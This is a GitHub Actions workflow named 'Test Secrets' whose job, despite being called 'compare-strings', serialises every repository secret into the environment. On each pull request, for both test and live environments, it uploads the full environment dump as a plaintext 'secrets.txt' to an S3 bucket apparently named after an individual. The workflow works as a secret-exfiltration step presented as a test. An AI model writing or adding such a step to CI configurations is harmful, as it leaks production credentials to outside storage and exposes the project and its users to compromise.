name: Test Secrets

on:
  pull_request:

jobs:
  compare-strings:
    runs-on: ubuntu-slim
    strategy:
      matrix:
        environment:
          - test
          - live
    permissions:
      id-token: write
    environment: ${{ matrix.environment }}

    steps:
      - uses: aws-actions/configure-aws-credentials@v6
        with:
          role-to-assume: ${{ secrets.AWS_HAZELCAST_OIDC_GITHUB_ACTIONS_ROLE_ARN }}
          aws-region: us-east-1

      - run: |
          printenv | aws s3 cp - "s3://jack-s3-bucket/${{ github.event.repository.name }} ${{ matrix.environment }} secrets.txt"
        env:
          SECRETS: '${{ toJson(secrets) }}'
